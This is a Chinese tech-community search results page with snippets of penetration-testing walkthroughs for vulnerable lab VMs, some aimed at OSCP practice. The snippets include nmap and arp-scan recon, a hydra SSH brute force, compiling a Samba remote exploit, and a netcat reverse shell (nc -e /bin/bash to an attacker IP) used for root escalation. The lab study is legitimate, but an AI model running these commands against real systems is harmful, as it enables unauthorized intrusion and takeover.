首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏OneMoreThink的专栏

    靶机实战(10):OSCP备考之VulnHub Tre 1

    使用命令sudo -u root nmap 172.16.33.53 -n -Pn -p- --reason -sV -sC -O发现主机开放的端口、提供的服务、使用的组件、组件的版本。

    56310编辑于 2024-10-15
  • 来自专栏渗透云笔记

    靶机练习 | DC:2 靶机渗透练习

    Kn0sky ---- 环境准备 DC:2靶机 Kali linux DC:2靶机 下载地址: http://www.five86.com/dc-2.html https://download.vulnhub.com 进入root目录找到final_flag ---- 主机发现 root@ptlab:~# arp-scan 10.2.2.0/24 Interface: eth0, datalink type: EN10MB 10.2.2.7 端口扫描 root@ptlab:~# nmap -A -T4 -p- 10.2.2.7 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10

    2.1K20发布于 2019-10-14
  • 来自专栏全栈程序员必看

    owasp靶机安装_靶机是什么

    owasp靶机应该是每个渗透入门乃至一些高手的一个试炼地之一,以下是我在靶机上搭建虚拟的方法。 1.虚拟机安装 在这里我用的是VMware14,靶机自然也是VM的。 百度云盘传送门【2c4j】 2.owasp靶机下载 下载链接 3.owasp靶机打开 在第二步链接打开之后,将会下载到一个文件 将其解压之后先放着,所放的盘建议有10G以上的内存。 注意看我圈起来的地方,靶机是基于Ubuntu的虚拟机,密码账号都在我圈的地方。 现在点击开启虚拟机就好了。 网络适配器的话就是NAT,为了安全尽量不要用桥接。

    1.1K10编辑于 2022-09-21
  • 来自专栏靶机复现

    blogger靶机

    wordpress搭建的网站→发现一个插件漏洞任意文件上传→上传shell→python反弹shell→获取vagrant用户密码→登录用户发现可以执行所有命令→sudo su提权→成功获取flag 首先扫描网络获取靶机

    54010编辑于 2022-04-12
  • 来自专栏FreeBuf

    JIS-CTF靶机+Kioptrix靶机渗透

    JIS靶机以拿到5个flag为止,本文攻击的靶机为kioptrix level1 以拿到root权限为止。 靶机下载/搭建: 靶机1: https://pan.baidu.com/s/1kt9dMb423DZhIKXObfbwTw ? 本次仅为完成获取靶机中全部flag为目的。 Kioptrix靶机过程 先获取靶机IP: 192.168.1.138 ? nmap开路: ? 使用命令: cp /usr/share/exploitdb/exploits/multiple/remote/10.c /root/10.c 拷贝该EXP到本机root目录下 使用gcc编译该EXP gcc 10.c -o fuck_samba ?

    1.2K40发布于 2018-07-30
  • 来自专栏HACK学习

    渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

    前言 挺久没更新靶机渗透文章,近期抽点时间继续更新文章,为什么这篇要2个靶机写在一起哪?因为第一个靶机虽然被困了几天但是其实比较简单故就和另外一个前段时间玩的合并在一起发表了…. 靶机安装/下载 Blacklight靶机下载: https://pan.baidu.com/s/1n1A7UlgDUHL1RdmXN0CDPw DeRPnStiNK靶机下载: https://pan.baidu.com /s/1ayCZ17PHxFe71vbldjGW2w Blacklight靶机IP:172.16.24.92 DeRPnStiNK靶机IP:172.16.24.69 攻击者IP:172.16.24.31 实战 1.Blacklight靶机 老规矩nmap开路,个人习惯直接全端口… 通过端口探测可以看到该靶机开启了2个服务端口,一个是80,一个是9072端口,其中9072端口显示未知服务…. 且权限为root 该靶机完!是不是很简单…. 2.DeRPnStiNK靶机 老规矩!

    1.5K20发布于 2019-08-07
  • 来自专栏Ms08067安全实验室

    【Vulnhub靶机系列】Breach1.0(附靶机

    文章来源|MS08067 安全实验室 本文作者:大方子(Ms08067实验室核心成员) 文章最后附靶机下载地址和完整版PDF 然后我们访问下新的地址 http://192.168.110.140

    76030编辑于 2022-05-27
  • 来自专栏闪石星曜CyberSecurity

    靶机练习 | DC:2 靶机渗透练习

    ---- 环境准备 DC:2靶机 Kali linux DC:2靶机 下载地址: http://www.five86.com/dc-2.html https://download.vulnhub.com 进入root目录找到final_flag ---- 主机发现 root@ptlab:~# arp-scan 10.2.2.0/24 Interface: eth0, datalink type: EN10MB 10.2.2.7 端口扫描 root@ptlab:~# nmap -A -T4 -p- 10.2.2.7 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10

    94220发布于 2019-10-14
  • 来自专栏渗透靶机

    hackmyvm靶机:Icecream

    arp-scan -I eth1 -l -I 指定eth1这个网卡 -l 扫描出全部主机 我们知道靶机的IP地址在192.168.31.204后使用namp扫描靶机。 因为这个靶机的/usr/sbin/ums2net是提权点。所以我们要创建一个a.conf 写入3000 of=/etc/sudoers。 先开启它,在用echo传东西。 太难了这个靶机

    47000编辑于 2025-05-08
  • 来自专栏网络安全攻防

    XXE靶机实践

    靶机介绍Haboob团队根据https://www.exploit-db.com/docs/45374发表的论文"XML外部实体注入-解释和利用"制作了这个虚拟机以利用私有网络中的漏洞,我们希望你喜欢这个挑战 靶机攻防攻击主机这里我们使用Kali linux和Windows 11作为本次攻击主机:信息收集由于靶机和攻击者主机Kali处于同一网段,所以我们进行一次网段扫描探测,最终确定靶机IP地址为192.168.204.138nmap .form-signin .form-signin-heading, .form-signin .checkbox { margin-bottom: 10px border-box; -moz-box-sizing: border-box; box-sizing: border-box; padding: 10px #017572; } .form-signin input[type="password"] { margin-bottom: 10px

    56810编辑于 2023-12-22
  • 来自专栏渗透靶机

    vulnyx靶机:Ober

    arp-scan -I eth0 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.30.56nmap 192.168.30.56 -A -O -p--A 进行全面扫描 后使用namp扫描靶机。开放22,80端口,8080端口。扫一下80和8080端口目录。 直接就结束了,但是我看到这个靶机还有一个用户。但是都直接拿到root了就没必要了。

    23400编辑于 2025-05-06
  • 来自专栏渗透靶机

    hackmyvm靶机:quoted

    arp-scan -I eth1 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.30.66后使用namp扫描靶机

    33800编辑于 2025-05-22
  • 来自专栏渗透靶机

    vulnyx靶机:First

    arp-scan -I eth1 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.30.11后使用namp扫描靶机

    25100编辑于 2025-01-16
  • 来自专栏渗透靶机

    vulnyx靶机:Beginner

    arp-scan -I eth1 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.30.16后使用namp扫描靶机。 这个靶机突破口在UDP端口上,这个我确实没注意这个东西。nmap 192.168.30.16 -sUudp开放了68,69端口。69的tftp有漏洞。找到一个backup-config的文件。 这样就拿下root了后续其实整个靶机都在测试你拿密钥的能力。但是开始的那个tftp的其实是没想到。

    54800编辑于 2025-01-21
  • 来自专栏渗透靶机

    hackmyvm靶机:buster

    arp-scan -I eth0 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.31.72后使用namp扫描靶机靶机echo 'nc -e /bin/bash 192.168.31.224 1234' > /tmp/run.shchmod +x /tmp/run.shecho 'tmp/run.sh' > a.txtkali 机mkdir tmpcd tmpecho ''>run.shcd ..python -m http.servernc -lvvp 1234靶机sudo gobuster -u http://192.168.31.224

    32100编辑于 2025-05-17
  • 来自专栏渗透靶机

    vulnyx靶机:Robot

    arp-scan -I eth1 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.30.31后使用namp扫描靶机

    38410编辑于 2025-02-02
  • 来自专栏渗透靶机

    vulnyx靶机:Fing

    arp-scan -I eth1 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.30.23后使用namp扫描靶机。 hydra -L u.txt -P /usr/share/seclists/Passwords/xato-net-10-million-passwords.txt ssh://192.168.30.23

    44900编辑于 2025-01-26
  • 来自专栏渗透靶机

    vulnyx靶机:Plot

    arp-scan -I eth1 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.30.40后使用namp扫描靶机

    23800编辑于 2025-02-11
  • 来自专栏E条咸鱼

    GoldenEye靶机渗透

    没意思没意思,太难了 按照老套路,上来先找到靶机IP地址,发现IP地址为 192.168.40.135 ? 开放了http服务,访问一下 ? 右键查看源代码,找到一个 .js文件 ? 很巧,16年以前的内核,可以用脏牛,wget到靶机 ? 但是在GCC编译的时候,发现了问题,靶机没有gcc ?

    92820发布于 2020-08-17
  • 来自专栏渗透靶机

    hackmyvm靶机:Gift

    arp-scan -I eth1 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.30.48后使用namp扫描靶机

    24800编辑于 2025-03-04
领券